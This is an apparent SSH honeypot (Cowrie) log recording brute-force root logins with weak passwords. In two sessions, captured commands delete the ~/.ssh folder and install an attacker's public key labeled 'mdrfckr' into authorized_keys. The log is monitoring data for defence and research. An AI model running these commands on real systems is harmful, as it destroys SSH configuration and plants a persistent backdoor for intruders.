{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:53:49.642470Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa111111.","message":"login attempt [root/Aa111111.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:53:50.689238Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:53:51.252770Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:53:51.253623Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:53:51.255292Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:51.507489Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:53:52.026562Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:53:52.027445Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:53:52.279361Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:52.280347Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57396,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2ddc9c35630","protocol":"ssh","message":"New connection: 212.227.235.229:57396 (1.2.3.4:22) [session: c2ddc9c35630]","sensor":"my-vps","timestamp":"2025-08-26T13:53:52.512271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:53:52.513262Z","src_ip":"212.227.235.229","session":"c2ddc9c35630"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:53:52.745284Z","src_ip":"212.227.235.229","session":"c2ddc9c35630"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:53:53.720691Z","src_ip":"212.227.235.229","session":"c2ddc9c35630"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:55.425947Z","src_ip":"212.227.235.229","session":"c2ddc9c35630"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57406,"dst_ip":"1.2.3.4","dst_port":22,"session":"172cda28ed36","protocol":"ssh","message":"New connection: 212.227.235.229:57406 (1.2.3.4:22) [session: 172cda28ed36]","sensor":"my-vps","timestamp":"2025-08-26T13:53:55.660796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:53:55.661502Z","src_ip":"212.227.235.229","session":"172cda28ed36"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:53:55.899683Z","src_ip":"212.227.235.229","session":"172cda28ed36"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:53:56.895768Z","src_ip":"212.227.235.229","session":"172cda28ed36"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:57.135496Z","src_ip":"212.227.235.229","session":"172cda28ed36"}
{"eventid":"cowrie.session.closed","duration":"7.7","message":"Connection lost after 7.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:53:57.138878Z","src_ip":"212.227.235.229","session":"164af48db69c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54026,"dst_ip":"1.2.3.4","dst_port":22,"session":"8b182452dea4","protocol":"ssh","message":"New connection: 212.227.125.160:54026 (1.2.3.4:22) [session: 8b182452dea4]","sensor":"my-vps","timestamp":"2025-08-26T13:54:01.327972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:54:01.467790Z","src_ip":"212.227.125.160","session":"8b182452dea4"}
{"eventid":"cowrie.client.kex","hassh":"98ddc5604ef6a1006a2b49a58759fbe6","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-26T13:54:04.604799Z","src_ip":"212.227.235.229","session":"d66a1bafbae6"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:54:05.584200Z","src_ip":"212.227.235.229","session":"d66a1bafbae6"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:54:22.158927Z","src_ip":"212.227.125.160","session":"8b182452dea4"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:54:27.248025Z","src_ip":"212.227.125.160","session":"8b182452dea4"}
{"eventid":"cowrie.session.closed","duration":"54.2","message":"Connection lost after 54.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:54:55.570309Z","src_ip":"212.227.125.160","session":"8b182452dea4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55584,"dst_ip":"1.2.3.4","dst_port":22,"session":"f13bd106f64c","protocol":"ssh","message":"New connection: 212.227.125.160:55584 (1.2.3.4:22) [session: f13bd106f64c]","sensor":"my-vps","timestamp":"2025-08-26T13:55:09.611798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T13:55:09.664653Z","src_ip":"212.227.125.160","session":"f13bd106f64c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T13:55:14.394167Z","src_ip":"212.227.125.160","session":"f13bd106f64c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51144,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3ba1ca75a3c","protocol":"ssh","message":"New connection: 212.227.235.229:51144 (1.2.3.4:22) [session: a3ba1ca75a3c]","sensor":"my-vps","timestamp":"2025-08-26T13:55:26.801819Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:55:26.802704Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:55:27.036972Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.login.success","username":"root","password":"P@$$w0rd123","message":"login attempt [root/P@$$w0rd123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:55:28.010088Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:55:29.564521Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:55:29.565245Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:55:29.566358Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:55:29.800392Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:55:30.284566Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:55:30.285340Z","src_ip":"212.227.235.229","session":"a3ba1ca75a3c"}
